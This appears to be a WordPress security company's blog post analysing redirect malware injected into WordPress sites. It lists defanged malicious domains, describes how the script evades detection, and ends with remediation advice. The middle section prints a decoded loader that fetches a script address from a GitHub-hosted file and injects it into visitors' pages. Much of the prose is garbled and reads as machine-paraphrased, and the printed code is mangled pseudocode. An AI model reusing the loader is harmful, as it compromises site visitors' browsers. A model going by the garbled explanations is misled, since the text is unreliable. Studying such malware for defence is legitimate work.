WordPress Malware: Malicious software designed to harm, exploit, or illegally access computers, networks, or data.

WordPress Splogs Redirect Traffic Unimaginatively to Sites Which are of No Value

Not long before, one of our customers came to us after realising that their website was redirecting traffic to suspicious URLs.

They thought that their website had been hacked and needed help with finding and fixing the problem.

This gave me an idea of how much deeper I need to look into the infection and its propagation patterns.

What did we notice?

Their website traffic was redirecting to hxxps://cdn1[.] Massearchtraffic[.]top/Sockets.

To my surprise, we found that the domain massearchtraffic[.]top is marked as malicious, and it is hosting malicious code, which causes page redirection to

hxxps://cdn1[.]massearchtraffic[.]top/sockets.

While I am writing this article, some other websites were also infected by attackers using WordPress malware.

These iframe tags were placed at the start of irrelevant blogs within an infected WordPress blog.

The malware was discovered with SiteCheck, which classifies it under Known JavaScript Malware: redirect?fake_click.1.

Understanding the Code for WordPress Malware

The very first check identifies whether the attacker’s code runs only once during a given session.

This particular check helps avoid detection by anti-malware systems.

The checking is performed by seeing whether a certain cookie is present or not.

Additionally, the script does not execute for logged-in WordPress users to mitigate suspicion from site admins.

The malware also has its logic to filter user requests based on user agents. For example, bots from search engines are not allowed.

Also, requests with certain substrings in their URLs, such as ”/wp-login.php” and ”/wp-json”, are denied.

Compromised devices could potentially be visitors to the hxxps: streamain[.]top/api[.]php domain.

This is dangerous, as the visitors are redirected to a malicious domain.

Moreover, additional payloads defined as malicious by the attacks are fetched and executed scripts that are injected into the visitor’s browser.

Lastly, this poses grave concerns for the users, as doing so compromises his/her device.

The following strings can be decoded into:

The need for and specifying ranges pose terrible concerns for the users, as the device is compromised.  

”hxxps://streamain[.] top/api[.]php” and  

Set the variable ‘url as  

‘hxxps://raw[.]githubusercontent[.]com/AlexanderRPatton/cdn/main/repo.txt’;  

fetch(url) then(response -> response.text())  

then(data -> {  

Set the variable script as the document. create Element(‘script’);  

script.src = data.trim();  

appendChild(script)   

to dependency head of document getElementsByTag(‘head’) 

});  

Hacking Tools Undetectable: The Wide Ranges.  

What mostly concerns the users is redirecting them to an hxxps: URL; the chance is that attackers aim to deceive people.

Behind the scenes, they could be preparing so-called backdoors for attackers, forever hiding the path.

What may have infected the site, and what were the attackers hoping to achieve?

Infection could happen from one or more of the reasons discussed below. 

The use of outdated or nulled themes and plugins: As it turns out, attackers could take advantage of plugins or themes that have not been updated in quite a long time and are outdated.

Custom code with weak logic: Attackers could have had an easy time infecting the scripts, provided that enough PHP scripts with weak logic were there to welcome them.

Attacks Using Existing Backdoors: If there were backdoors on the site, attackers could easily add more malicious scripts, inject other scripts, or, after partial infection cleanup, some scripts could be re-added, making the system reinfected.

Attacks from Once Compromised Accounts: Admin accounts once compromised could lead to using the control panel logins for hosting accounts, as WordPress could execute all its functions on the exposed logins and drop every form of malware the admin accounts once compromised allow into the server.

Such infections are not solely unique, as other people may have reasons such as:

Spam Injection Can Change Online Presence: Spam injections can spur red flags, which may cause a loss of reliability in spam-filled domains.

Search Reputation Sabotage: For penalising bots of websites like Google and Bing, getting fines from legitimate users while losing sight of a website is certain.

Exploiting Infected Target Traffic: With their devious plan, attackers could aid victory traffic surges while malicious plunge flow rises.

Malicious content injection of spam LOIs: other annoying programming content designed to disrupt the normal behaviour of the infected issuing site.

Conclusion: Defending Your WordPress Site from Malware Redirects

This WordPress malware circulation demonstrates how easily attackers capitalise on gaps in WordPress websites, installing and executing a myriad of invasive codes , controlling their traffic and user flow, and so forth.

The consequences have a far wider spectrum than just a security breach; it also damages your reputation on search engines and brand image, and even erodes the

confidence your users have in you. This is precisely why, in today’s world, having a comprehensive multi-layered security strategy should not even be considered an option.

Periodic maintenance, strict user role policies, active command and control server (C2) scanning, and edge firewalls can alleviate your site’s vulnerability to these attacks.

It is a fact that denial is the best strategy, and in this case, working actively to prevent it is always better and cheaper than recovering.

Do not wait if your site has already been compromised; malware has the capability to evolve and self-replicate at a rapid pace. Have a proper cleanup and security service

like Sucuri and Wordfence do a complete examination and remove any infections, as well as fortify the site against advanced persistent threats so it can withstand futile attacks

in the future.

Users of Elyspace.com are highly encouraged to shift the perception and narrative about online security. Have it embedded as a primary segment in your digital strategy

Instead of merely reacting after something goes wrong.

Remediation Steps to Remove WordPress Malware

Update WordPress Core, Plugins, and Themes: Install updates to plug known vulnerabilities on a regular basis.

Audit custom code: Use secure coding standards for any custom PHP script.

Scan for backdoors: Utilise malware scanners such as Sucuri to detect concealed backdoors.

Strengthen account security: implement strong passwords and two-factor authentication for every account.

Use a website firewall: A web application firewall (WAF) can filter out malicious requests prior to reaching your site.

Clean up unused plugins and themes: Take away any unnecessary and inactive plugins and themes to lower the chance of attacks against your website.

Prevent login attempts: limit the number of logins to decrease the likelihood of brute force attacks on administrator accounts.

Track changes of files: Use Wordfence or iThemes Security to track changes on certain files and folders of your WordPress.

Prevent PHP from running in untrusted folders: PHP can be turned off in folders such as /wp-content/uploads/ so that potential malware attempts cannot be run.

Back up the site regularly: Make backups on a regular schedule so that any loss of data due to viruses or errors can be fixed quickly.

Implement least privileged access: Administratively restrict users to the minimal interface required; prefer not to set full administrator access too freely.

Review site activity monitoring logs: Regularly check files, changes, and login activities performed to help detect suspicious actions.